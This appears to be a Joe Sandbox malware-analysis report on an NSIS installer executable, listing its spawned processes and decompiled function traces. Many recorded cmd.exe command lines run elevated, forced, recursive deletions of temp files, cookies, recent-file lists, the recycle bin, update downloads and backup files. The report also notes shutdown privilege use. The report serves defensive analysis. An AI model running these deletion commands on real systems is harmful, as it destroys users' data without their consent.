Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	03:02:56
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	03:02:57
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	03:02:57
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	03:02:57
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	03:03:17
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	65
Start time:	03:03:17
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	66
Start time:	03:03:17
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	67
Start time:	03:03:17
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	68
Start time:	03:03:17
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	69
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	70
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	71
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	72
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	79
Start time:	03:03:18
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23%
Total number of Nodes:	1226
Total number of Limit Nodes:	22

Executed Functions

Function 004030CB Relevance: 70.3, APIs: 24, Strings: 16, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004030EA
SetErrorMode.KERNELBASE(00008001), ref: 004030F5
OleInitialize.OLE32(00000000), ref: 004030FC

Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D

SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124

Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA

GetCommandLineA.KERNEL32(00423680,NSIS Error), ref: 00403139
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040314C
CharNextA.USER32(00000000,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000020), ref: 00403177
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
DeleteFileA.KERNELBASE(1033), ref: 0040323E
ExitProcess.KERNEL32(00000000), ref: 004032B7
CoUninitialize.COMBASE(00000000), ref: 004032BC
ExitProcess.KERNEL32 ref: 004032DC
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000), ref: 004032E8
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004032F4
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
CopyFileA.KERNEL32(C:\Users\user\Desktop\G3izWAY3Fa.exe,0041F030,00000001), ref: 00403365
CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
ExitWindowsEx.USER32(00000002,00000000), ref: 00403423
ExitProcess.KERNEL32 ref: 00403446

Strings

1033, xrefs: 00403239
~nsu.tmp, xrefs: 004032E2
SeShutdownPrivilege, xrefs: 004033F9
", xrefs: 00403199
Error launching installer, xrefs: 00403274
\Temp, xrefs: 00403225
NSIS Error, xrefs: 0040312A
C:\Windows\temp, xrefs: 004031F5, 0040328E, 0040330D, 00403316
C:\Users\user\Desktop, xrefs: 004032ED, 004032F2, 00403315
C:\Users\user\Desktop\G3izWAY3Fa.exe, xrefs: 00403360
NCRC, xrefs: 004031B7
_?=, xrefs: 00403265
C:\Users\user\AppData\Local\Temp\, xrefs: 004031FF, 00403204, 0040321E, 0040322A, 004032E7, 004032F3, 004032FF, 00403306, 004033A6
"C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 0040313F, 00403145, 0040325B
C:\Windows\temp, xrefs: 00403299
/D=, xrefs: 004031CD

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\G3izWAY3Fa.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G3izWAY3Fa.exe$C:\Windows\temp$C:\Windows\temp$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 553446912-3967748765
Opcode ID: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
Instruction ID: cc286ec977d2638fbe9c092aa5ad16f4889e12429ffafd7da1ab197300c5bae6
Opcode Fuzzy Hash: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
Instruction Fuzzy Hash: 9691B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E

Function 00405FA8 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
Instruction ID: ffbedf2a53f09e030cb941e21afd419a8c3069ec791793070072d3341ca218b9
Opcode Fuzzy Hash: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
Instruction Fuzzy Hash: 17F16571D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A86CF44

Function 00405CFF Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction ID: d69b72dbe4010a9b48e4a262f362438d38f190b8a9031efe6831075815a54aa0
Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction Fuzzy Hash: 5DE08C32A04610BBD3215B20AE0896B73A8EED9B403004C7EF615F6251D734AC11DBBA

Function 00403526 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D

lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
lstrlenA.KERNEL32(open C:\Windows\temp\Edit9,?,?,?,open C:\Windows\temp\Edit9,00000000,C:\Windows\temp,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\G3izWAY3Fa.exe"), ref: 0040360C
lstrcmpiA.KERNEL32(?,.exe), ref: 0040361F
GetFileAttributesA.KERNEL32(open C:\Windows\temp\Edit9), ref: 0040362A
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Windows\temp), ref: 00403673

Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948

RegisterClassA.USER32 ref: 004036BA
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040370B
ShowWindow.USER32(00000005,00000000), ref: 00403741
LoadLibraryA.KERNEL32(RichEd20), ref: 00403752
LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
GetClassInfoA.USER32(00000000,RichEdit20A,00423620), ref: 0040376D
GetClassInfoA.USER32(00000000,RichEdit,00423620), ref: 0040377A
RegisterClassA.USER32(00423620), ref: 00403783
DialogBoxParamA.USER32(?,00000000,004038BC,00000000), ref: 004037A2

Strings

open C:\Windows\temp\Edit9, xrefs: 004035DA, 004035E2, 004035EF, 00403639, 0040363F
Control Panel\Desktop\ResourceLocale, xrefs: 0040355A
1033, xrefs: 00403546, 00403592
.DEFAULT\Control Panel\International, xrefs: 00403582
_Nb, xrefs: 004036C9, 004036CE
C:\Windows\temp, xrefs: 004035A6, 004035AE, 00403646, 0040364C, 0040365C
RichEdit, xrefs: 00403774
RichEdit20A, xrefs: 00403765, 0040376B
RichEd20, xrefs: 0040374D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040352A
"C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 00403532
.exe, xrefs: 00403619
6B, xrefs: 00403682
RichEd32, xrefs: 00403758

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: 6B$"C:\Users\user\Desktop\G3izWAY3Fa.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Windows\temp$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$open C:\Windows\temp\Edit9
API String ID: 914957316-3617224747
Opcode ID: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
Instruction ID: 0f3f48bff709b167bb3a38cee6451da723a784a17f6d38f49bc0c0f1e25ee8dd
Opcode Fuzzy Hash: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
Instruction Fuzzy Hash: 9261C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D67D9E028B3E

Function 00402C22 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C33
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\G3izWAY3Fa.exe,00000400), ref: 00402C4F

Part of subcall function 004056B4: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 004056B8
Part of subcall function 004056B4: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 00402C9B

Strings

C:\Users\user\Desktop\G3izWAY3Fa.exe, xrefs: 00402C39, 00402C48, 00402C5C, 00402C7C
C:\Users\user\Desktop, xrefs: 00402C7D, 00402C82, 00402C88
Null, xrefs: 00402D19
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C22
"C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 00402C2C
(pA, xrefs: 00402CB0
Error launching installer, xrefs: 00402C72
Inst, xrefs: 00402D07
soft, xrefs: 00402D10

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$(pA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G3izWAY3Fa.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-616736272
Opcode ID: f0b155bb72d4673e8e2538c02c47e4f576f948850c8845f4e559d72db7119d93
Instruction ID: bb8333a86194dcf573844375b596ab0c7c07cd824b72df89bd2f0bbec4532e5a
Opcode Fuzzy Hash: f0b155bb72d4673e8e2538c02c47e4f576f948850c8845f4e559d72db7119d93
Instruction Fuzzy Hash: 21511971A00214ABDB209F65DE89B9E7BB4EF04319F10403BF904B62D1D7BC9E458BAD

Function 00401734 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA

